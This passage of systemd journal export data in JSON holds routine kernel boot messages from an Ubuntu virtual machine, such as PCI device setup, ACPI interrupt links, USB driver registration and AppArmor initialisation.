"PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:04.0", "_UDEV_SYSNAME" : "0000:00:04.0", 
"_SOURCE_MONOTONIC_TIMESTAMP" : "335597", "MESSAGE" : "pci 0000:00:04.0: reg 0x20: [mem 0xfe004000-0xfe007fff 64bit pref]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=10d;b=e2b08827b5804427b422c10c84f1567e;m=567973;t=5bd16dd19f8da;x=8ff045f9f3e8fc82", "__REALTIME_TIMESTAMP" : "1615280779950298", "__MONOTONIC_TIMESTAMP" : "5667187", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:05.0", "_UDEV_SYSNAME" : "0000:00:05.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "337790", "MESSAGE" : "pci 0000:00:05.0: [1af4:1002] type 00 class 0x00ff00" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=10e;b=e2b08827b5804427b422c10c84f1567e;m=567a66;t=5bd16dd19f9cd;x=7d0a2d1aec5849bc", "__REALTIME_TIMESTAMP" : "1615280779950541", "__MONOTONIC_TIMESTAMP" : "5667430", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:05.0", "_UDEV_SYSNAME" : "0000:00:05.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "338824", "MESSAGE" : "pci 0000:00:05.0: reg 0x10: [io 0xc0a0-0xc0bf]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=10f;b=e2b08827b5804427b422c10c84f1567e;m=567afa;t=5bd16dd19fa62;x=616e0cb21b26318b", "__REALTIME_TIMESTAMP" : "1615280779950690", "__MONOTONIC_TIMESTAMP" : "5667578", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:05.0", "_UDEV_SYSNAME" : "0000:00:05.0", 
"_SOURCE_MONOTONIC_TIMESTAMP" : "341694", "MESSAGE" : "pci 0000:00:05.0: reg 0x20: [mem 0xfe008000-0xfe00bfff 64bit pref]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=110;b=e2b08827b5804427b422c10c84f1567e;m=567b1c;t=5bd16dd19fa83;x=a407ca8354182a3b", "__REALTIME_TIMESTAMP" : "1615280779950723", "__MONOTONIC_TIMESTAMP" : "5667612", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "344087", "MESSAGE" : "ACPI: PCI Interrupt Link [LNKA] (IRQs 5 *10 11)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=111;b=e2b08827b5804427b422c10c84f1567e;m=567b39;t=5bd16dd19faa0;x=5a080d416374655", "__REALTIME_TIMESTAMP" : "1615280779950752", "__MONOTONIC_TIMESTAMP" : "5667641", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "348221", "MESSAGE" : "ACPI: PCI Interrupt Link [LNKB] (IRQs 5 *10 11)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=112;b=e2b08827b5804427b422c10c84f1567e;m=567b56;t=5bd16dd19fabe;x=f56c6933e8a41b64", "__REALTIME_TIMESTAMP" : "1615280779950782", "__MONOTONIC_TIMESTAMP" : "5667670", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "351450", "MESSAGE" : "ACPI: PCI Interrupt Link [LNKC] (IRQs 5 10 *11)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=113;b=e2b08827b5804427b422c10c84f1567e;m=567b61;t=5bd16dd19fac8;x=769b2591422f969", "__REALTIME_TIMESTAMP" : "1615280779950792", "__MONOTONIC_TIMESTAMP" : "5667681", 
"_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "352146", "MESSAGE" : "ACPI: PCI Interrupt Link [LNKD] (IRQs 5 10 *11)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=114;b=e2b08827b5804427b422c10c84f1567e;m=567b6c;t=5bd16dd19fad3;x=195d7febbfa8445e", "__REALTIME_TIMESTAMP" : "1615280779950803", "__MONOTONIC_TIMESTAMP" : "5667692", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "355786", "MESSAGE" : "ACPI: PCI Interrupt Link [LNKS] (IRQs *9)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=115;b=e2b08827b5804427b422c10c84f1567e;m=567b76;t=5bd16dd19fadd;x=b6df4498793218fa", "__REALTIME_TIMESTAMP" : "1615280779950813", "__MONOTONIC_TIMESTAMP" : "5667702", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "356645", "MESSAGE" : "SCSI subsystem initialized" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=116;b=e2b08827b5804427b422c10c84f1567e;m=567b81;t=5bd16dd19fae9;x=8d55216e4c7e3dcd", "__REALTIME_TIMESTAMP" : "1615280779950825", "__MONOTONIC_TIMESTAMP" : "5667713", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_SOURCE_MONOTONIC_TIMESTAMP" : "358701", "MESSAGE" : "libata version 3.00 loaded." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=117;b=e2b08827b5804427b422c10c84f1567e;m=567c19;t=5bd16dd19fb80;x=c2175f8ff043c5a4", "__REALTIME_TIMESTAMP" : "1615280779950976", "__MONOTONIC_TIMESTAMP" : "5667865", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:02.0", "_UDEV_SYSNAME" : "0000:00:02.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "358802", "MESSAGE" : "pci 0000:00:02.0: vgaarb: setting as boot VGA device" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=118;b=e2b08827b5804427b422c10c84f1567e;m=567c9d;t=5bd16dd19fc04;x=7a84bcfa070c7460", "__REALTIME_TIMESTAMP" : "1615280779951108", "__MONOTONIC_TIMESTAMP" : "5667997", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:02.0", "_UDEV_SYSNAME" : "0000:00:02.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "360000", "MESSAGE" : "pci 0000:00:02.0: vgaarb: VGA device added: decodes=io+mem,owns=io+mem,locks=none" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=119;b=e2b08827b5804427b422c10c84f1567e;m=567d39;t=5bd16dd19fca0;x=8ee36903463241db", "__REALTIME_TIMESTAMP" : "1615280779951264", "__MONOTONIC_TIMESTAMP" : "5668153", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:02.0", "_UDEV_SYSNAME" : "0000:00:02.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "360008", "MESSAGE" : "pci 0000:00:02.0: vgaarb: bridge control 
possible" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=11a;b=e2b08827b5804427b422c10c84f1567e;m=569d98;t=5bd16dd1a1d00;x=3a17ec29797ff8da", "__REALTIME_TIMESTAMP" : "1615280779959552", "__MONOTONIC_TIMESTAMP" : "5676440", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "363066", "MESSAGE" : "vgaarb: loaded" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=11b;b=e2b08827b5804427b422c10c84f1567e;m=569dac;t=5bd16dd1a1d14;x=1b30f904cb43f9ba", "__REALTIME_TIMESTAMP" : "1615280779959572", "__MONOTONIC_TIMESTAMP" : "5676460", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "364055", "MESSAGE" : "ACPI: bus type USB registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=11c;b=e2b08827b5804427b422c10c84f1567e;m=569db8;t=5bd16dd1a1d20;x=97b8feb4e6f9b89", "__REALTIME_TIMESTAMP" : "1615280779959584", "__MONOTONIC_TIMESTAMP" : "5676472", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "366051", "MESSAGE" : "usbcore: registered new interface driver usbfs" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=11d;b=e2b08827b5804427b422c10c84f1567e;m=569dc3;t=5bd16dd1a1d2a;x=42fa479078c5c9e8", "__REALTIME_TIMESTAMP" : "1615280779959594", "__MONOTONIC_TIMESTAMP" : "5676483", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : 
"e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "368021", "MESSAGE" : "usbcore: registered new interface driver hub" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=11e;b=e2b08827b5804427b422c10c84f1567e;m=569dcd;t=5bd16dd1a1d35;x=fa26700969233205", "__REALTIME_TIMESTAMP" : "1615280779959605", "__MONOTONIC_TIMESTAMP" : "5676493", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "370837", "MESSAGE" : "usbcore: registered new device driver usb" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=11f;b=e2b08827b5804427b422c10c84f1567e;m=569dd9;t=5bd16dd1a1d40;x=a30123e6c2ae603e", "__REALTIME_TIMESTAMP" : "1615280779959616", "__MONOTONIC_TIMESTAMP" : "5676505", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "372107", "MESSAGE" : "EDAC MC: Ver: 3.0.0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=120;b=e2b08827b5804427b422c10c84f1567e;m=569de3;t=5bd16dd1a1d4a;x=4154a9cbb9225c3a", "__REALTIME_TIMESTAMP" : "1615280779959626", "__MONOTONIC_TIMESTAMP" : "5676515", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "374382", "MESSAGE" : "PCI: Using ACPI for IRQ routing" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=121;b=e2b08827b5804427b422c10c84f1567e;m=569ded;t=5bd16dd1a1d55;x=2f78176316d38990", "__REALTIME_TIMESTAMP" : "1615280779959637", "__MONOTONIC_TIMESTAMP" : 
"5676525", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_SOURCE_MONOTONIC_TIMESTAMP" : "376022", "MESSAGE" : "PCI: pci_cache_line_size set to 64 bytes" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=122;b=e2b08827b5804427b422c10c84f1567e;m=569df8;t=5bd16dd1a1d5f;x=a1fa3e5d92e59af1", "__REALTIME_TIMESTAMP" : "1615280779959647", "__MONOTONIC_TIMESTAMP" : "5676536", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_SOURCE_MONOTONIC_TIMESTAMP" : "376268", "MESSAGE" : "e820: reserve RAM buffer [mem 0x0009fc00-0x0009ffff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=123;b=e2b08827b5804427b422c10c84f1567e;m=569e08;t=5bd16dd1a1d70;x=33fcc6444001df97", "__REALTIME_TIMESTAMP" : "1615280779959664", "__MONOTONIC_TIMESTAMP" : "5676552", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_SOURCE_MONOTONIC_TIMESTAMP" : "376272", "MESSAGE" : "e820: reserve RAM buffer [mem 0x7ffdc000-0x7fffffff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=124;b=e2b08827b5804427b422c10c84f1567e;m=569e1a;t=5bd16dd1a1d81;x=7de80462cb8c7234", "__REALTIME_TIMESTAMP" : "1615280779959681", "__MONOTONIC_TIMESTAMP" : "5676570", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "376470", "MESSAGE" : "NetLabel: Initializing" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=125;b=e2b08827b5804427b422c10c84f1567e;m=569e2d;t=5bd16dd1a1d95;x=745e5eda13f04557", "__REALTIME_TIMESTAMP" : "1615280779959701", "__MONOTONIC_TIMESTAMP" : "5676589", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "378389", "MESSAGE" : "NetLabel: domain hash size = 128" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=126;b=e2b08827b5804427b422c10c84f1567e;m=569e3b;t=5bd16dd1a1da2;x=5eb1798268020a50", "__REALTIME_TIMESTAMP" : "1615280779959714", "__MONOTONIC_TIMESTAMP" : "5676603", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "380004", "MESSAGE" : "NetLabel: protocols = UNLABELED CIPSOv4 CALIPSO" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=127;b=e2b08827b5804427b422c10c84f1567e;m=569e56;t=5bd16dd1a1dbd;x=f7c58fa3f2230516", "__REALTIME_TIMESTAMP" : "1615280779959741", "__MONOTONIC_TIMESTAMP" : "5676630", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "383125", "MESSAGE" : "NetLabel: unlabeled traffic allowed by default" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=128;b=e2b08827b5804427b422c10c84f1567e;m=569e61;t=5bd16dd1a1dc8;x=daa121a1bb582c16", "__REALTIME_TIMESTAMP" : "1615280779959752", "__MONOTONIC_TIMESTAMP" : "5676641", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : 
"e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "384157", "MESSAGE" : "clocksource: Switched to clocksource kvm-clock" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=129;b=e2b08827b5804427b422c10c84f1567e;m=569e7a;t=5bd16dd1a1de2;x=594e45daf27ba689", "__REALTIME_TIMESTAMP" : "1615280779959778", "__MONOTONIC_TIMESTAMP" : "5676666", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "399085", "MESSAGE" : "VFS: Disk quotas dquot_6.6.0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=12a;b=e2b08827b5804427b422c10c84f1567e;m=569e85;t=5bd16dd1a1ded;x=1c5f6b3ad0a4a228", "__REALTIME_TIMESTAMP" : "1615280779959789", "__MONOTONIC_TIMESTAMP" : "5676677", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "401433", "MESSAGE" : "VFS: Dquot-cache hash table entries: 512 (order 0, 4096 bytes)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=12b;b=e2b08827b5804427b422c10c84f1567e;m=569e8f;t=5bd16dd1a1df7;x=e4ee10d3baf6d49a", "__REALTIME_TIMESTAMP" : "1615280779959799", "__MONOTONIC_TIMESTAMP" : "5676687", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "405167", "MESSAGE" : "AppArmor: AppArmor Filesystem Enabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=12c;b=e2b08827b5804427b422c10c84f1567e;m=569e9d;t=5bd16dd1a1e05;x=25ba10917f9ea7ff", "__REALTIME_TIMESTAMP" : 
"1615280779959813", "__MONOTONIC_TIMESTAMP" : "5676701", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "407740", "MESSAGE" : "pnp: PnP ACPI init" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=12d;b=e2b08827b5804427b422c10c84f1567e;m=569f31;t=5bd16dd1a1e99;x=5b4cb66e7102180b", "__REALTIME_TIMESTAMP" : "1615280779959961", "__MONOTONIC_TIMESTAMP" : "5676849", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pnp", "_KERNEL_DEVICE" : "+pnp:00:00", "_UDEV_SYSNAME" : "00:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "409661", "MESSAGE" : "pnp 00:00: Plug and Play ACPI device, IDs PNP0b00 (active)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=12e;b=e2b08827b5804427b422c10c84f1567e;m=569fe9;t=5bd16dd1a1f51;x=85e432ba051410c7", "__REALTIME_TIMESTAMP" : "1615280779960145", "__MONOTONIC_TIMESTAMP" : "5677033", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pnp", "_KERNEL_DEVICE" : "+pnp:00:01", "_UDEV_SYSNAME" : "00:01", "_SOURCE_MONOTONIC_TIMESTAMP" : "409719", "MESSAGE" : "pnp 00:01: Plug and Play ACPI device, IDs PNP0303 (active)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=12f;b=e2b08827b5804427b422c10c84f1567e;m=56a05f;t=5bd16dd1a1fc6;x=25b3311a744d6bbf", "__REALTIME_TIMESTAMP" : "1615280779960262", "__MONOTONIC_TIMESTAMP" : "5677151", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" 
: "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pnp", "_KERNEL_DEVICE" : "+pnp:00:02", "_UDEV_SYSNAME" : "00:02", "_SOURCE_MONOTONIC_TIMESTAMP" : "409747", "MESSAGE" : "pnp 00:02: Plug and Play ACPI device, IDs PNP0f13 (active)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=130;b=e2b08827b5804427b422c10c84f1567e;m=56a0ec;t=5bd16dd1a2054;x=b684f5eb4ed39c3e", "__REALTIME_TIMESTAMP" : "1615280779960404", "__MONOTONIC_TIMESTAMP" : "5677292", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pnp", "_KERNEL_DEVICE" : "+pnp:00:03", "_UDEV_SYSNAME" : "00:03", "_SOURCE_MONOTONIC_TIMESTAMP" : "409763", "MESSAGE" : "pnp 00:03: [dma 2]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=131;b=e2b08827b5804427b422c10c84f1567e;m=56a166;t=5bd16dd1a20cd;x=e03675d55dbb4263", "__REALTIME_TIMESTAMP" : "1615280779960525", "__MONOTONIC_TIMESTAMP" : "5677414", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pnp", "_KERNEL_DEVICE" : "+pnp:00:03", "_UDEV_SYSNAME" : "00:03", "_SOURCE_MONOTONIC_TIMESTAMP" : "409774", "MESSAGE" : "pnp 00:03: Plug and Play ACPI device, IDs PNP0700 (active)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=132;b=e2b08827b5804427b422c10c84f1567e;m=56a1ed;t=5bd16dd1a2155;x=49979f895bc17be0", "__REALTIME_TIMESTAMP" : "1615280779960661", "__MONOTONIC_TIMESTAMP" : "5677549", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : 
